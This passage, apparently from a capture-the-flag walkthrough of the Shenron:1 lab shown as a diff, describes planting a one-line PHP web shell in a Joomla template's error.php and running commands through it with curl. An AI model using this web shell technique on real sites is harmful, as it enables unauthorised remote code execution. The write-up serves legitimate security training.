ChristElise/christelise.github.io/_posts/2024-09-02-shenron1-walkthrough.md

 Great, we successfully logged in as the admin.
 Next, we move to Extensions -> Templates -> Templates where attempt to add a PHP shell to a PHP file in an unused template.
 Here, I chose the protostar template and added a basic PHP shell ``` system($_GET["cmd"]);``` to the error.php file.
 *NB: In a real-world penetration test try to use a more complicated name for the GET parameter value such as a hash.
 This is because anyone can access that file hence if a common name is used, attackers may bruteforce it and also use it to establish their foothold in your client's environment.*
 ![Template Modification](/assets/img/posts/walthrough/vulnhub/2024-09-02--shenron%3A1/template-modification.png)
-After modifying the template we can now execute commands on our target by browsing to the page and specify the command we want to run as the GET parameter's value.<br>
+After modifying the template we can now execute commands on our target by browsing to the page and specifying the command we want to run as the GET parameter's value.<br>
 ```curl http://10.0.2.4/joomla/templates/protostar/error.php?cmd=id```<br><br>
 ![RCE Test](/assets/img/posts/walthrough/vulnhub/2024-09-02--shenron%3A1/rce-test.png)